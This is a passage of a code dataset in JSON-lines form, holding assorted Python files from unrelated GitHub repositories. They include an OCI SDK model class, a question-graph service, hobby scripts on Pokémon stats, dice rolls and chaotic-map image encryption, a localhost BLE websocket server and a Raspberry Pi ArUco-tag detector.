\"YOLO\"\n NAME_YOLO = \"YOLO\"\n\n #: A constant which can be used with the name property of a ExportFormat.\n #: This constant has a value of \"PASCAL_VOC\"\n NAME_PASCAL_VOC = \"PASCAL_VOC\"\n\n #: A constant which can be used with the name property of a ExportFormat.\n #: This constant has a value of \"JSONL_COMPACT_PLUS_CONTENT\"\n NAME_JSONL_COMPACT_PLUS_CONTENT = \"JSONL_COMPACT_PLUS_CONTENT\"\n\n #: A constant which can be used with the version property of a ExportFormat.\n #: This constant has a value of \"V2003\"\n VERSION_V2003 = \"V2003\"\n\n #: A constant which can be used with the version property of a ExportFormat.\n #: This constant has a value of \"V5\"\n VERSION_V5 = \"V5\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new ExportFormat object with values from keyword arguments.\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param name:\n The value to assign to the name property of this ExportFormat.\n Allowed values for this property are: \"JSONL\", \"JSONL_CONSOLIDATED\", \"CONLL\", \"SPACY\", \"COCO\", \"YOLO\", \"PASCAL_VOC\", \"JSONL_COMPACT_PLUS_CONTENT\"\n :type name: str\n\n :param version:\n The value to assign to the version property of this ExportFormat.\n Allowed values for this property are: \"V2003\", \"V5\"\n :type version: str\n\n \"\"\"\n self.swagger_types = {\n 'name': 'str',\n 'version': 'str'\n }\n\n self.attribute_map = {\n 'name': 'name',\n 'version': 'version'\n }\n\n self._name = None\n self._version = None\n\n @property\n def name(self):\n \"\"\"\n Gets the name of this ExportFormat.\n Name of export format.\n\n Allowed values for this property are: \"JSONL\", \"JSONL_CONSOLIDATED\", \"CONLL\", \"SPACY\", \"COCO\", \"YOLO\", \"PASCAL_VOC\", \"JSONL_COMPACT_PLUS_CONTENT\"\n\n\n :return: The name of this ExportFormat.\n :rtype: str\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"\n Sets the name of this ExportFormat.\n Name of export format.\n\n\n :param name: The name of this ExportFormat.\n :type: str\n \"\"\"\n allowed_values = [\"JSONL\", \"JSONL_CONSOLIDATED\", \"CONLL\", \"SPACY\", \"COCO\", \"YOLO\", \"PASCAL_VOC\", \"JSONL_COMPACT_PLUS_CONTENT\"]\n if not value_allowed_none_or_none_sentinel(name, allowed_values):\n raise ValueError(\n f\"Invalid value for `name`, must be None or one of {allowed_values}\"\n )\n self._name = name\n\n @property\n def version(self):\n \"\"\"\n Gets the version of this ExportFormat.\n Version of export format.\n\n Allowed values for this property are: \"V2003\", \"V5\"\n\n\n :return: The version of this ExportFormat.\n :rtype: str\n \"\"\"\n return self._version\n\n @version.setter\n def version(self, version):\n \"\"\"\n Sets the version of this ExportFormat.\n Version of export format.\n\n\n :param version: The version of this ExportFormat.\n :type: str\n \"\"\"\n allowed_values = [\"V2003\", \"V5\"]\n if not value_allowed_none_or_none_sentinel(version, allowed_values):\n raise ValueError(\n f\"Invalid value for `version`, must be None or one of {allowed_values}\"\n )\n self._version = version\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n","repo_name":"oracle/oci-python-sdk","sub_path":"src/oci/data_labeling_service/models/export_format.py","file_name":"export_format.py","file_ext":"py","file_size_in_byte":4927,"program_lang":"python","lang":"en","doc_type":"code","stars":345,"dataset":"github-code","pt":"52"} +{"seq_id":"9809694231","text":"import networkx\n\nfrom signals.apps.questionnaires.app_settings import MAX_QUESTIONS\nfrom signals.apps.questionnaires.models import Edge, Question\n\n\nclass QuestionGraphService:\n def __init__(self, q_graph):\n self._q_graph = q_graph\n\n def refresh_from_db(self):\n \"\"\"\n Retrieve all QuestionGraph data, cache it.\n \"\"\"\n # Retrieve all relevant edges, questions and answers\n self._edges = self._get_edges(self._q_graph)\n self._nx_graph = self._build_nx_graph(self._q_graph, self._edges)\n self._questions = self._get_all_questions(self._nx_graph)\n\n # setup caches for quick access\n self._edges_by_id = {e.id: e for e in self._edges}\n self._questions_by_id = {q.id: q for q in self._questions}\n\n self._reachable_questions_by_id = self._get_reachable_questions(self._nx_graph, self._q_graph)\n self._endpoint_questions_by_id = self._get_endpoint_questions(\n self._nx_graph, self._questions_by_id, self._reachable_questions_by_id)\n\n def _get_edges(self, q_graph):\n \"\"\"\n List of Edge instances decsribing QuestionGraph structure.\n \"\"\"\n return list(Edge.objects.filter(graph=q_graph)\n .select_related('choice')\n .select_related('question')\n .select_related('next_question'))\n\n @staticmethod\n def _build_nx_graph(q_graph, edges):\n \"\"\"\n Get NetworkX graph representing the QuestionGraph.\n \"\"\"\n # To allow for matching rule and default rule (i.e. a double edge).\n nx_graph = networkx.MultiDiGraph()\n\n for edge in edges:\n # Needed for rule matching and determining next questions (edge\n # ordering is important if several rules match and we want\n # consistent results):\n edge_kwargs = {\n 'choice_payload': None if edge.choice is None else edge.choice.payload,\n 'choice_payload_display': '' if edge.choice is None else edge.choice.display,\n 'edge_id': edge.id,\n 'order': edge.order,\n }\n\n # Needed for question graph visualization:\n if edge.choice:\n edge_kwargs['choice_label'] = (f'{edge.choice.display or edge.choice.payload}'\n f' {\" (selected)\" if edge.choice.selected else \"\"}')\n\n # Add the edge with all relevant information:\n nx_graph.add_edge(edge.question_id, edge.next_question_id, **edge_kwargs)\n\n # Add node metadata\n nx_graph.add_node(edge.question.id, label=edge.question.label, ref=edge.question.ref,\n multiple_answers_allowed=edge.question.multiple_answers_allowed)\n nx_graph.add_node(edge.next_question.id, label=edge.next_question.label, ref=edge.next_question.ref)\n\n if len(nx_graph) > MAX_QUESTIONS:\n msg = f'Question graph {q_graph.name} contains too many questions.'\n raise Exception(msg)\n\n if q_graph.first_question and q_graph.first_question not in nx_graph.nodes:\n nx_graph.add_node(q_graph.first_question.id, label=q_graph.first_question.label,\n ref=q_graph.first_question.ref,\n multiple_answers_allowed=q_graph.first_question.multiple_answers_allowed)\n\n return nx_graph\n\n @staticmethod\n def _get_reachable_questions(nx_graph, q_graph):\n \"\"\"\n Grab questions linked to QuestionGraph reachable from first_question.\n \"\"\"\n reachable = networkx.descendants(nx_graph, q_graph.first_question.id)\n reachable.add(q_graph.first_question.id)\n\n return {q.id: q for q in Question.objects.filter(id__in=reachable)}\n\n @staticmethod\n def _get_endpoint_questions(nx_graph, questions_by_id, reachable_questions_by_id):\n \"\"\"\n Get endpoint questions in QuestionGraph.\n \"\"\"\n endpoint_questions_by_id = {}\n for question_id, out_degree in nx_graph.out_degree():\n if out_degree == 0 and question_id in reachable_questions_by_id:\n endpoint_questions_by_id[question_id] = questions_by_id[question_id]\n\n return endpoint_questions_by_id\n\n @staticmethod\n def _get_all_questions(nx_graph):\n \"\"\"\n Grab questions linked to QuestionGraph.\n \"\"\"\n return list(Question.objects.filter(id__in=nx_graph.nodes()))\n\n @property\n def endpoint_questions(self):\n \"\"\"\n List of questions that form the endpoints of a QuestionGraph.\n \"\"\"\n if not hasattr(self, '_endpoint_questions_by_id'):\n self.refresh_from_db()\n return self._endpoint_questions_by_id\n\n @property\n def nx_graph(self):\n \"\"\"\n networkx.MultiDigraph instance representing QuestionGraph.\n \"\"\"\n if not hasattr(self, '_nx_graph'):\n self.refresh_from_db()\n return self._nx_graph\n\n @property\n def questions(self):\n \"\"\"\n List of Question instance (reachable and not) for QuestionGraph.\n \"\"\"\n if not hasattr(self, '_questions'):\n self.refresh_from_db()\n return self._questions\n\n @property\n def reachable_questions(self):\n \"\"\"\n List of Question instances for QuestionGraph (only reachable ones).\n \"\"\"\n if not hasattr(self, '_reachable_questions_by_id'):\n self.refresh_from_db()\n return list(self._reachable_questions_by_id.values())\n\n def validate(self):\n \"\"\"\n Check QuestionGraph for validity.\n \"\"\"\n # TODO, check QuestionGraph for the following:\n # - maximum number of questions\n # - no unreachable questions\n # - decision points (questions) in the graph must enforce questions\n pass\n","repo_name":"Amsterdam/signals","sub_path":"app/signals/apps/questionnaires/services/question_graph.py","file_name":"question_graph.py","file_ext":"py","file_size_in_byte":5909,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"52"} +{"seq_id":"74725514085","text":"import sys\n\ntry:\n\tmap_input = sys.argv[1]\n\tinput = sys.argv[2]\n\toutput = sys.argv[3]\nexcept:\n\tprint(\"param: $(map input file) $(input file) $(output file)\")\n\tsys.exit()\n\nm = {}\n\nwith open(map_input, 'r') as f:\n\tfor l in f:\n\t\tl = l.strip().split('\\t')\n\t\tm[l[0].lower()] = l[1]\n\nwith open(input, 'r') as fi:\n\twith open(output, 'w') as fo:\n\t\tfo.write(\"id,sequence\\n\")\n\t\tfor i,l in enumerate(fi):\n\t\t\tfo.write('%d,' % i)\n\t\t\ttmp = []\n\t\t\tfor e in l:\n\t\t\t\ttry:\n\t\t\t\t\te = e.lower()\n\t\t\t\t\ttmp.append(m[e])\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\tfo.write(''.join(tmp)+'\\n')\n","repo_name":"chialunwu/MLDS-final","sub_path":"script/sentence_to_ch_2.py","file_name":"sentence_to_ch_2.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"22642064762","text":"# Databricks notebook source\n# DBTITLE 1,Import Libraries\n# MAGIC %md\n# MAGIC Reference : https://blog.devgenius.io/daily-coding-problem-problem-11-3452b3a63ddb\n# MAGIC\n# MAGIC\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Implement a job scheduler which takes in a function f and an integer n, and calls f after n milliseconds.\n\n# COMMAND ----------\n\n# DBTITLE 1,*args (Non-Keyword Arguments)\ndef add(*args):\n list1 = sum(list(map(lambda v : v**2 , args )))\n return list1\n\n#l2 = list(map(lambda v: v ** 2, l1))\nadd(2,3,5)\n \n\n# COMMAND ----------\n\n# DBTITLE 1,*kwargs (Keyword Arguments)\ndef kwar(**kwargs):\n \n for key, value in kwargs.items():\n print(\"%s == %s\" % (key, value))\n \ndict = {\"test\":1, \"test2\":2 , \"test3\": 3}\nkwar(**dict)\n\n# COMMAND ----------\n\n# DBTITLE 1,Simple\nimport time\ndef func(**args):\n for i in args:\n print(i)\n sleep(10)\n \nl1 = {\"job1\":2,\"job2\" : 5,\"Job3\": 6, \"Job4\" : 9}\nfunc(**l1)\n\n# COMMAND ----------\n\nfrom time import sleep, time\nclass Scheduler:\n def __init__(self):\n self.functions = []\n thread = threading.Thread(target=self._poll)\n thread.start()\n def _poll(self):\n while True:\n now = time() * 1000\n if len(self.functions) > 0:\n due, func, args, kwargs = self.functions[0]\n if now > due:\n func(*args, **kwargs)\n self.functions = [(due, func, args, kwargs) for due, func, args, kwargs in self.functions if due < now]\n sleep(0.01)\n def schedule(self, func, n, *args, **kwargs):\n heapq.heappush(self.functions, (n + time() * 1000, func, args, kwargs))","repo_name":"srinujammu/Daily-Coding","sub_path":"Daily coding - 11.py","file_name":"Daily coding - 11.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6671483649","text":"import asyncio\nimport websockets\nimport json\nimport os\n\nfrom ble_project import BLEProject\nfrom serial_data import SerialData\n\nCHUNK_SIZE = 1000\nPORT = 64569\n\n\nclass ClientCommand:\n\n @classmethod\n def from_json(cls, str):\n obj = json.loads(str)\n hub = obj[\"hub\"]\n funcname = obj[\"func\"]\n args = obj[\"args\"]\n return_id = obj[\"return_id\"]\n return cls(hub, funcname, args, return_id)\n \n def __init__(self, hub, funcname, args, return_key=None):\n self.hub = hub\n self.funcname = funcname\n self.args = args\n self.return_key = return_key\n \n async def commit(self, project):\n if self.hub is None:\n func = getattr(project, self.funcname)\n else:\n func = getattr(project.hubs[self.hub], self.funcname)\n\n if asyncio.iscoroutinefunction(func):\n # print(f\"awaiting coroutine: {func} with args {self.args}\")\n result = await func(*self.args)\n else:\n # print(f\"executing func: {func}\")\n result = func(*self.args)\n \n if self.return_key is not None:\n send_data = SerialData(self.return_key, self.hub, result)\n await project.out_queue.put(send_data)\n\n\nclass BLEServer:\n\n def __init__(self):\n self.project = BLEProject\n self.server = None\n self.connected = False\n\n \n async def out_handler(self, websocket, path):\n while True:\n print(\"[BLEServer] waiting for messages to send...\")\n serial_data = await project.out_queue.get()\n message = serial_data.to_json()\n print(f\"[BLEServer] sending message: {message}\")\n await websocket.send(message)\n \n async def in_handler(self, websocket, path):\n print(\"[BLEServer] waiting for messages to receive...\")\n async for message in websocket:\n print(f\"[BLEServer] got message: {message}\")\n command = ClientCommand.from_json(message)\n await command.commit(project)\n\n async def server_loop(self, websocket, path):\n self.connected = True\n print(\"listening for commands now\")\n \n in_task = asyncio.ensure_future(self.in_handler(websocket, path))\n out_task = asyncio.ensure_future(self.out_handler(websocket, path))\n done, pending = await asyncio.wait([in_task, out_task], return_when=asyncio.FIRST_COMPLETED)\n print(\"in or out handler are done!\")\n for task in pending:\n task.cancel()\n # except websockets.exceptions.ConnectionClosed:\n # break\n self.connected = False\n\n async def serve(self):\n print(\"serving now\")\n async def wait_for_connected():\n while not self.connected:\n await asyncio.sleep(1)\n async def wait_for_disconnected():\n while self.connected:\n await asyncio.sleep(1)\n async with websockets.serve(self.server_loop, \"localhost\", PORT) as server:\n await wait_for_connected()\n await wait_for_disconnected()\n\nproject = None\n\nasync def main():\n global project\n print(f\"cwd: {os.getcwd()}\")\n print(f\"script: {__file__}\")\n project = BLEProject()\n server = BLEServer()\n await server.serve()\n\nif __name__ == \"__main__\":\n \n asyncio.run(main())\n","repo_name":"Novakasa/brickrail","sub_path":"ble-server/ble_server.py","file_name":"ble_server.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"52"} +{"seq_id":"15454323066","text":"with open('./boxid.txt') as f:\r\n\tlines = f.read().splitlines()\r\ntwiced = 0\r\nthriced = 0\r\nletters = list()\r\nfor str in lines:\r\n letters.clear()\r\n count2 = 0\r\n count3 = 0\r\n for x in str:\r\n if x not in letters:\r\n letters.append(x)\r\n val = str.count(x)\r\n if val == 2:\r\n count2 += 1\r\n if val == 3:\r\n count3 += 1\r\n if count2 > 0:\r\n twiced += 1\r\n if count3 > 0:\r\n thriced += 1\r\nprint(twiced * thriced)\r\n \r\n","repo_name":"Acellama88/AdventOfCode","sub_path":"AoC02/AoC02p1.py","file_name":"AoC02p1.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20287497000","text":"from weather import Weather, Unit\nimport Driver\n\nclass WeatherMap(Driver.Driver):\n device_name = \"weathermap\"\n def get(self, req):\n weather = Weather(unit=Unit.FAHRENHEIT)\n\n lookup = weather.lookup(2464467)\n condition = lookup.condition\n if req==\"temp\":\n return condition.temp\n elif req == \"skies\":\n return condition.text\n elif req == \"all\":\n return str(condition.temp) + u'\\u00B0' + \", \" + condition.text\nw = WeatherMap()\nprint(w.get(\"all\"))\n \n","repo_name":"naclcaleb/Charles","sub_path":"WeatherMap.py","file_name":"WeatherMap.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"13494953881","text":"import pandas as pd\r\n\r\n#df_csv = pd.read_csv('pokemon_data.csv')\r\n\r\npd.options.display.max_rows = 9999\r\npd.options,display.max_columns = 9999\r\n\r\n# Reads .CSV file and stores data in dataframe\r\ndf = pd.read_csv('pokemon_data.csv')\r\n\r\n# Creating new columns / data for the dataframe\r\n#df_csv['Total'] = df_csv['HP'] + df_csv['Attack'] + df_csv['Defense'] + df_csv['Sp .Atk'] + df_csv['Sp. Def]\r\n\r\n#df_amended = df_csv.drop(columns = ['Speed'])\r\n\r\n#for index, row in df_csv.iterrows():\r\n# print(index, row)\r\n# print('\\n')\r\n\r\n#df_ammended.to_csv('modified_data.csv')\r\n#df_ammended.to_excel('modified_data.xlsx)\r\n#df_ammended.to_csv('modified_data.txt', sep = '\\t')\r\n\r\n#Task 1 \r\n#This creats all the different types of pokemon\r\ntotal_types = df['Type 1'].value_counts()\r\n\r\n#Task 2 \r\n#Sorts out each attack, by the different generation of what the pokemon is\r\nattack_by_generation = df['Attack'].groupby(df['Generation']).mean()\r\n\r\n#Task 3 \r\n#This gives you the average stats for each trait; so attack, defence etc\r\naverage_stats = df[['Attack', 'Defense', 'Sp. Atk', 'Sp. Def', 'HP']].groupby(df['Generation']).mean()\r\n\r\n#Task 4 \r\n#Gives you the top 10 values for the 'attack' trait\r\ntop_10 = df.sort_values(['Attack'], ascending = False).head(10)\r\n\r\n#Task 5 \r\n#Gives you the bottom 10 values for the 'attack' trait\r\nbottom_10 = df.sort_values(['Attack'], ascending = False).tail(10)\r\n\r\n#SAVING NEW DATABASE\r\ntotal_types.to_csv('total_types_database.csv')\r\nattack_by_generation.to_csv('attack_by_generation_database.csv')\r\naverage_stats.to_csv('average_stats_database.csv')\r\ntop_10.to_csv('top_10_database.csv')\r\nbottom_10.to_csv('bottom_10_database.csv') ","repo_name":"JamesBradleyBigCreative/Classroom_Exercises","sub_path":"Evan Manister/pokemon pandas/pokemon pandas/pokemon_pandas.py","file_name":"pokemon_pandas.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"74081718565","text":"# This is a sample Python script.\n\nimport threading\nimport math\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\nimport random\nimport time\n\nimport cv2\nimport numpy\nimport numpy as np\nfrom PIL import Image\nfrom PIL.Image import Image\nfrom matplotlib import pyplot as plt\nfrom skimage import img_as_float\n\n\n# Переписать генерацию ключа в массив\n# разобраться почему шифрование - говно (скорее всего проблема с ключом) см generate_key и generate_n\n\ndef chebushev(xn, l1, n):\n x = np.zeros(n)\n x[0] = xn\n for i in range(n - 1):\n x[i + 1] = math.cos(l1 * (1 / math.cos(x[i])))\n return x[::-1]\n\n\ndef logistic(x0, l2, n):\n x = np.zeros(n)\n x[0] = x0\n for i in range(n - 1):\n x[i + 1] = l2 * x[i] * (1 - x[i])\n return x\n\n\ndef cubic(x0, l3, n):\n x = np.zeros(n)\n x[0] = x0\n for i in range(n - 1):\n x[i + 1] = l3 * x[i] * (1 - x[i] ** 2)\n return x\n\n\ndef sine(x0, l4, n):\n x = np.zeros(n)\n x[0] = x0\n for i in range(n - 1):\n x[i + 1] = l4 * math.sin(math.pi * x[i])\n return x\n\n\ndef tent(x0, mu, n):\n x = np.zeros(n)\n x[0] = x0\n for i in range(n - 1):\n if (x[i] <= mu):\n x[i + 1] = x[i] / mu\n else:\n x[i + 1] = (1 - x[i]) / (1 - mu)\n return x\n\n\ndef henon(x0, x1, a, l5, n):\n x = np.zeros(n)\n x[0] = x0\n x[1] = x1\n for i in range(3, n):\n x[i] = 1 + l5 * (x[i - 2] - x[i - 3]) - a * (x[i - 2] ** 2)\n return x\n\n\ndef generate_i_c(key):\n n = 0.0\n for i in key:\n n += int(i, 2) / 256\n\n return n - math.floor(n)\n\n\ndef generate_key():\n key = []\n for i in range(0, 32):\n key.append(str.ljust(bin(random.randint(1, 255)).replace(\"0b\", ''), 8, '0'))\n return key\n\n\ndef generate_secret_key(bk, lk, ck, sk, tk, hk):\n res = np.zeros((len(bk)))\n for i in range(len(bk)):\n res[i] = int(bk[i], 2) ^ int(lk[i], 2) ^ int(ck[i], 2) ^ int(sk[i], 2) ^ int(tk[i], 2) ^ int(hk[i], 2)\n return res\n\n\ndef generate_n(img):\n vector = img.reshape((img.shape[0] * img.shape[1],))\n\n b_vector = []\n n = 0\n\n for i in range(np.size(vector)):\n b_vector.append(str.zfill(bin(vector[i]).replace(\"0b\", ''), 8))\n if i % 32 == 0:\n n += 1\n return n, b_vector\n\n\ndef encrypt(img_list, key, orig):\n res = []\n\n img_list_int = np.zeros(len(img_list))\n for i in range(len(img_list)):\n img_list_int[i] = int(img_list[i], 2)\n for i in range(int(len(img_list) / len(key))):\n img_cut = img_list_int[i * len(key):i * len(key) + len(key)]\n res.append(np.int_(img_cut) ^ np.int_(key))\n nail = img_list_int[int(len(img_list) / len(key)) * len(key): len(img_list)]\n res.append(np.int_(nail) ^ np.int_(key[:len(nail):]))\n return np.array([x for l in res for x in l]).reshape((orig.shape[0], orig.shape[1]))\n\n\ndef decrypt(encrimg, key):\n res = []\n encr_vector = encrimg.reshape((encrimg.shape[0] * encrimg.shape[1],))\n for i in range(int(len(encr_vector) / len(key))):\n img_cut = encr_vector[i * len(key):i * len(key) + len(key)]\n res.append(np.int_(img_cut) ^ np.int_(key))\n nail = encr_vector[int(len(encr_vector) / len(key)) * len(key): len(encr_vector)]\n res.append(np.int_(nail) ^ np.int_(key[:len(nail):]))\n return (np.array([x for l in res for x in l])).reshape((encrimg.shape[0], encrimg.shape[1]))\n\n\ndef float_to_bin_fixed(f):\n if not math.isfinite(f):\n return repr(f) # inf nan\n\n sign = '-' * (math.copysign(1.0, f) < 0)\n frac, fint = math.modf(math.fabs(f)) # split on fractional, integer parts\n n, d = frac.as_integer_ratio() # frac = numerator / denominator\n assert d & (d - 1) == 0 # power of two\n return f'{sign}{math.floor(fint):b}.{n:0{d.bit_length() - 1}b}'\n\n\ndef convert(arr):\n chaos = []\n for i in arr:\n chaos.append(float_to_bin_fixed(i).replace('-', '')[2:10:])\n return chaos\n\n\ndef calculate_math(enctypted):\n # m_x = np.mean(enctypted, axis=1)\n # m_y = np.mean(enctypted, axis=0)\n # print('m_x', m_x)\n # print('m_y', m_y)\n var = 0\n m = np.mean(enctypted)\n print('m', m)\n for i in range(enctypted.shape[0]):\n for j in range(enctypted.shape[1]):\n var += (enctypted[i][j] - m) ** 2\n var = var / (enctypted.shape[0] * enctypted.shape[1])\n print('var', var)\n # var_x = 1 / (enctypted.shape[0] * enctypted.shape[1]) * np.sum(a)\n # var_y = np.var(enctypted, axis=0)\n # print('var_x', var_x)\n # print('var_y', var_y)\n\n\n # con_xy = 1 / (enctypted.shape[0] * enctypted.shape[1]) * np.sum()\n\n\ndef plot_img_and_hist(image, axes, bins=256):\n # Преобразование изображения в формат с плавающей запятой двойной точности\n image = img_as_float(image)\n ax_img, ax_hist = axes\n ax_img.imshow(image, cmap=plt.cm.gray)\n\n # Display histogram\n ax_hist.hist(image.flatten(), bins=bins, histtype='step', color='black')\n ax_hist.set_xlabel('Pixel intensity', fontsize=25)\n ax_hist.tick_params(axis=\"x\", labelsize=20)\n ax_hist.tick_params(axis=\"y\", labelsize=20)\n\n return ax_img, ax_hist\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n # block size = 256\n start = time.time()\n key = generate_key()\n ic = generate_i_c(key)\n l1 = 4\n l2 = 4\n l3 = 2.59\n l4 = 0.99\n l5 = 0.3\n a = random.uniform(1.07, 1.09)\n mu = 0.4\n\n vid_capture = cv2.VideoCapture('video.mkv')\n frame_width = int(vid_capture.get(3))\n frame_height = int(vid_capture.get(4))\n frame_size = (frame_width, frame_height)\n output = cv2.VideoWriter('output_video.avi',\n cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'), 20, frame_size)\n\n file = open(\"keys.txt\", \"w\")\n\n\n\n while (vid_capture.isOpened()):\n # Метод vid_capture.read() возвращает кортеж, первым элементом которого является логическое значение\n # а вторым - кадр\n ret, frame = vid_capture.read()\n if ret:\n img = cv2.imread(frame, cv2.IMREAD_GRAYSCALE)\n\n n, img_b = generate_n(img)\n\n bk = chebushev(ic, l1, n)\n lk = logistic(ic, l2, n)\n ck = cubic(ic, l3, n)\n sk = sine(ic, l4, n)\n tk = tent(ic, mu, n)\n hk = henon(ic, ic, a, l5, n)\n\n secret_key = generate_secret_key(convert(bk), convert(lk), convert(ck), convert(sk), convert(tk),\n convert(hk))\n file.write(secret_key)\n encrypted = encrypt(img_b, secret_key, img)\n decrypted = decrypt(encrypted, secret_key)\n output.write(encrypted)\n else:\n print('Поток отключен')\n break\n vid_capture.release()\n output.release()\n file.close()\n\n\n # vid_capture = cv2.VideoCapture('output_video.avi')\n # frame_width = int(vid_capture.get(3))\n # frame_height = int(vid_capture.get(4))\n # frame_size = (frame_width, frame_height)\n # output = cv2.VideoWriter('output_decrypted_video.avi',\n # cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'), 20, frame_size)\n # while (vid_capture.isOpened()):\n # # Метод vid_capture.read() возвращает кортеж, первым элементом которого является логическое значение\n # # а вторым - кадр\n # ret, frame = vid_capture.read()\n # if ret:\n #\n # n, img_b = generate_n(frame)\n # decrypted = decrypt(frame, secret_key)\n # output.write(decrypted)\n # else:\n # print('Поток отключен')\n # break\n\n\n\n # calculate_math(enctypted)\n #\n # end = time.time() - start\n # print(end)\n #\n # fig = plt.figure(figsize=(15, 15))\n # axes = np.zeros((2, 1), dtype=object)\n # axes[0, 0] = fig.add_subplot(211)\n # axes[1, 0] = fig.add_subplot(212)\n #\n # # ax_img, ax_hist = plot_img_and_hist(enctypted, axes[:, 0])\n # ax_img, ax_hist = plot_img_and_hist(decrypted, axes[:, 0])\n # ax_hist.set_ylabel('Number of pixels', fontsize=25)\n # # prevent overlap of y-axis labels\n # fig.tight_layout()\n # plt.show()\n","repo_name":"ISSS163/Crypto","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22811459615","text":"'''\nPython Programming - advanced lists\n@author: Mohana Kamanooru - 15/10/2020\n\nCreate a program to throw 2 dice 100 times. Record how often each number from 2 to 12 is\nthrown in a suitable list and then print out a graph of your results like so:\nDistribution Chart\nScore Rolls\n2 1 *\n3 5 *****\n4 11 ***********\n5 13 *************\n6 15 ***************\n7 16 ****************\n8 18 ******************\n9 8 ********\n10 6 ******\n11 4 ****\n12 3 ***\n'''\nfrom random import randint\nglobal OCCURANCE\nglobal ROLL_COUNT\n\ndef get_dice_output():\n current_output = randint(1, 6) + randint(1, 6)\n return current_output\n\ndef get_occurances():\n for ind in range(0,ROLL_COUNT):\n current_output=get_dice_output()\n if(current_output in range(2,13)):\n OCCURANCE[current_output-2]+=1;\n \n\ndef show_graph():\n for x in range(0,len(OCCURANCE)): \n print(str(x+2).ljust(2),\" \",str(OCCURANCE[x]).ljust(2),\" \",OCCURANCE[x]*'*')\n #print(sum(OCCURANCE))\n \n\nROLL_COUNT=100\nOCCURANCE=[0]*11\nget_occurances()\nshow_graph()\n\n \n \n\n \n\n# get the dice output\n# check if the out out put is in the list ","repo_name":"mohanakamanooru/Python","sub_path":"3 Functions and Lists/advanced_lists/dice_Distribution.py","file_name":"dice_Distribution.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"71105496164","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 9 10:51:05 2022\n\n@author: Mahmoud Saeed\n\"\"\"\n\"\"\"\nproblem link :\n\n \nhttps://www.codingninjas.com/codestudio/guided-paths/data-structures-algorithms/\ncontent/118509/offering/1376554\n\"\"\"\n\narr = [1 ,3, 1, 4 ,3, 1]\nn = len(arr)\n\ndef longestMountain(arr , n):\n if n < 3:\n return 0\n i = 0\n k = 0\n while i < n:\n j = i\n if (j+1 < n) and (arr[j] < arr[j+1]):\n while (j+1 < n) and (arr[j] < arr[j+1]):\n j +=1\n \n if (j+1 < n) and (arr[j] > arr[j+1]):\n while (j+1 < n) and (arr[j] > arr[j+1]):\n j +=1\n \n k = max(k, j - i +1)\n \n i = max(j ,i+1) \n\n return k\n \n\n \nm = longestMountain(arr, n) \n\nprint(m) ","repo_name":"mahmoudsaeed99/CodeStudioProblems-coding-ninjas-","sub_path":"python/longestMountain.py","file_name":"longestMountain.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33063622408","text":"import cv2\nimport picamera\nimport time\nimport RPi.GPIO as GPIO\n\nenemy_pin = 16\nfriend_pin = 12\n\n#capture set number of frames on set camera\ndef run(frames=100,cam_num=0):\n\t#set up pins\n\tGPIO.setmode(GPIO.BCM)\n\tGPIO.setup(enemy_pin,GPIO.OUT)\n\tGPIO.setup(friend_pin,GPIO.OUT)\n\tGPIO.output(enemy_pin,0)\n\tGPIO.output(friend_pin,0)\n\t\n\t#set up aruco parameters\n\tarucoDict = cv2.aruco.Dictionary_get(cv2.aruco.DICT_6X6_250)\n\tarucoParams = cv2.aruco.DetectorParameters_create()\n\n\t#create camera object\n\tcam = cv2.VideoCapture(cam_num)\n\n\ttags = []\n\tfor i in range(frames):\n\t\t#capture frame, convert to gray, show frame\n\t\tret, image = cam.read()\n\t\timage = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\t\tcv2.imshow('Imagetest',image)\n\t\t#wait for 50ms or keystroke\n\t\tk = cv2.waitKey(20)\n\t\t#if keystroke closes window then break loop\n\t\tif k != -1 :\n\t\t\tcam.release()\n\t\t\tcv2.destroyAllWindows()\t\n\t\t\tprint(tags)\n\t\t\tbreak\n\t\t#detect aruco tags in frame\t\t\n\t\t(corners,ids,rejected) = cv2.aruco.detectMarkers(image,arucoDict,\n\t\t\tparameters=arucoParams)\n\t\t#if a tag is detected then check if enemy or friend\n\t\tif ids is not None:\n\t\t\tvec = corners[0][0][0] - corners[0][0][1]\n\t\t\td = vec[0]**2 + vec[1]**2\n\t\t\tif d > 10000:\n\t\t\t\tif ids[0][0] >= 10 and ids[0][0] not in 